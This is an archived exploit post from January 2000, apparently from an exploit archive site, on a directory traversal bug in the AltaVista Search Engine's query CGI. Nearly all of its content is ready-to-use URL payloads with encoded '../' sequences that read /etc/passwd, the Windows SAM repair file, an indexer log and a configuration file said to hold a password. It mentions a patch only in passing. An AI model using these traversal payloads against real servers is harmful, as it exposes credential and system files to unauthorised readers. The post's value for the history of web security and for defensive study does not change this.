exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

altavista.txt

altavista.txt
Posted Jan 12, 2000
Authored by RC

Exploit information for the recent bugs in the Altavista Search Engine to read any file on the system.

tags | exploit
SHA-256 | 31947cb85d87ea62e83e870b5086f47b97bbc339e314a15df7b3eb2b2b1af1f4

altavista.txt

Change Mirror Download
hola,

more bugs in the AV-Search thing ..

using uri-encoded strings it is possible to view "any" file on the system ..

examples:

unixxxsss ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd

or on an micro$oft IIS ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._

interesting infos about the file structure ...

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log

or another file which does contain the password ..

http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf

altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.

whatever ....

nicedays :-/

RC
rudicarell@hotmail.com


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close